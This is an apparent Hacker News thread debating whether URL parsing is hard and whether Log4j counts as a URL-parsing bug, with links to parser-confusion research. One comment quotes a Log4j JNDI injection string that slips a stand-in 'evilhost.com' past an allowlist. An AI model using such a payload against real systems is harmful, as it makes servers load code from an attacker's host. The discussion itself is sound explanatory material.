Parsing an url is really a pain in the a\*

SloopJon · on March 16, 2024

Another post in this thread was downvoted and flagged (really?) for claiming that URL parsing isn't difficult. The linked article claims that "Parsing URLs correctly is surprisingly hard." As a software tester, I'm very willing to believe that, but I don't know that the article really made the case.

I did find a paper describing some vulnerabilities in popular URL parsing libraries, including urllib and urllib3. Blog post here:

https://claroty.com/team82/research/exploiting-url-parsing-c...

Paper here:

https://web-assets.claroty.com/exploiting-url-parsing-confus...

If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.

masklinn · on March 16, 2024

> If you remember the Log4j vulnerability from a couple of years ago, that was an URL parsing bug.

I don't think that's a fair description of the issue.

The log4j vulnerability was that it specifically added JNDI support (https://issues.apache.org/jira/browse/LOG4J2-313) to property substitution (https://logging.apache.org/log4j/2.x/manual/configuration.ht...), which it would apply on logged messages. So it was a pretty literal feature of log4j. log4j would just pass the URL to JNDI for resolution, and substitute the result.

SloopJon · on March 16, 2024

I didn't look into this in detail at the time, but the report's summary of CVE-2021-45046 is that the parser that validated an URL behaved differently than a separate parser used to fetch the URL, so an URL like

    jndi:ldap://127.0.0.1#.evilhost.com:1389/a

is validated as 127.0.0.1, which may be whitelisted, but fetched from evilhost.com, which probably isn't.